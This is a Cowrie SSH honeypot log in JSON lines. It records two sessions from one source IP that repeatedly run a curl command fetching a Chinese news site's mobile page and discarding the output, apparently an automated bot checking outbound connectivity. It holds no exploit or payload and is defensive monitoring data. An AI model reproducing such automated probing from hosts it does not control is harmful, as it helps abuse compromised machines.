{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.004342Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.006942Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.008883Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.017652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.020001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.020749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.025423Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.034263Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.035498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.036107Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.042893Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.057755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.058553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.073800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.074464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.097937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.098632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.105357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.114069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.114646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.116827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.118999Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.136221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.136808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.156449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.157042Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.159714Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.161707Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.167212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.175207Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.176607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.177417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.181106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.192276Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.195460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.196070Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.214816Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.215451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.218699Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.238944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.239571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.241984Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.252570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.253697Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.261382Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.268960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.277015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.277673Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.290276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.290908Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.297785Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.316670Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.317327Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.325289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.325865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.355753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.356377Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.363928Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.364525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.387278Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.388989Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.395864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.396450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.399130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.399580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.432828Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.433558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.435160Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.435764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.468676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.469332Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.472659Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.473592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.510797Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.511714Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.516288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.516896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.546858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.547717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.555350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.555956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.582307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.583076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.591690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.592533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.597402Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.619988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.620676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.625459Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.630020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
